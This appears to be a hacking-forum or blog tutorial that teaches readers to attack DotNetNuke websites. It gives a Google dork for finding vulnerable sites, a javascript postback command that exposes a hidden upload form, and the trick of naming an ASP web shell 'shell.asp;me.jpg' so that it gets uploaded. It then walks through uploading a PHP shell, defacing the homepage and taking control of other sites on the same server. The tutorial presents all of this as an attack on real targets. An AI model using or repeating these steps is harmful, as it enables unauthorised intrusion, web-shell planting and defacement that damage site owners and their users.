Hello Green Hackerz,
Today I will explain another hacking technique known as DNN (DotNetNuke).
I will show you how to hack a DNN website.
Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.
I will teach you how to find your target and how to enter into the target website and upload your files.
WHAT IS DNN ?
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Some easy Steps to implement Attack..
Things you will need:
An ASP Shell
PHPJackal OR C99 Shell
Some nice Deface pages.
To Download above files Click Here
Go to Google and type
inurl:fcklinkgallery.aspx
Now you will see lots of websites.
Pick anyone.
Now you will see something like this:
Press File.
Now you will probably see something like this:
Ok so now you go to your address bar and paste this Code & Hit Enter :
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Now You Will See Something Like this :
Yes Now We Can Upload Files From Our Compuetr :
Press Browse Open Downloaded files and select shell.asp;me.jpg and click Upload selected files.
Yeah
We have Uploaded our ASP Shell.
Now to navigate to our shell,goto
Code:
http://www.TARGETSITE.com/portals/0/shell.asp;me.jpg
You Will Get This :
Now you can upload your PHPJackal Shell ( included in the Everything you need.rar thing).
Now navigate to
Code:
http://www.TARGETSITE.com/portals/0/jackalshell.php
And rename one of the deface pages (the pages that were in the Everything you need thing) too index.html and upload it on the root of the site.
You have now defaced a site.
Wait Wait Wait
Not Only This Even you can control the root of the server
See This :
And Now Click on the Website you see like this :
Now You Control all the website which is on that server
Now you Get This..
OK Friends....
Leave Your Comments & Feedbacks...
Happy DNN Hacking....@@@@@@